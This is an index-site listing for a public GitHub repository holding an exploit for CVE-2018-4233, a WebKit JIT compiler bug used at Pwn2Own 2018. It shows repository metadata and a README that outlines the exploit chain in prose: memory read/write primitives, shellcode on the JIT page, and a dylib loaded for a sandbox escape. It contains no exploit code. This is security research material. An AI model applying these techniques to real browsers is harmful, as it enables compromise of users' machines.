Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/saelo/cve-2018-4233

Exploit for CVE-2018-4233, a WebKit JIT optimization bug used during Pwn2Own 2018
https://github.com/saelo/cve-2018-4233

Last synced: about 1 month ago
JSON representation

Exploit for CVE-2018-4233, a WebKit JIT optimization bug used during Pwn2Own 2018

Host: GitHub
URL: https://github.com/saelo/cve-2018-4233
Owner: saelo
Created: 2018-08-08T14:41:20.000Z (over 6 years ago)
Default Branch: master
Last Pushed: 2018-08-17T23:31:46.000Z (over 6 years ago)
Last Synced: 2023-11-07T17:04:37.104Z (about 1 year ago)
Language: JavaScript
Size: 10.7 KB
Stars: 174
Watchers: 12
Forks: 33
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

# CVE-2018-4233

Exploit for CVE-2018-4233, a bug in the JIT compiler of WebKit. Tested on Safari 11.0.3 on macOS 10.13.3.

For more details see https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf

The exploit gains arbitrary memory read/write by constructing the addrof and fakeobj primitives and subsequently faking a typed array as described in http://www.phrack.org/papers/attacking_javascript_engines.html. Afterwards it locates the JIT page and writes the stage1 shellcode there. That in turn writes a .dylib (contained in stage2.js) to disk and loads it into the renderer process to perform a sandbox escape. Stage 2 uses a separate vulnerability to break out of the Safari sandbox and will be published at a later point.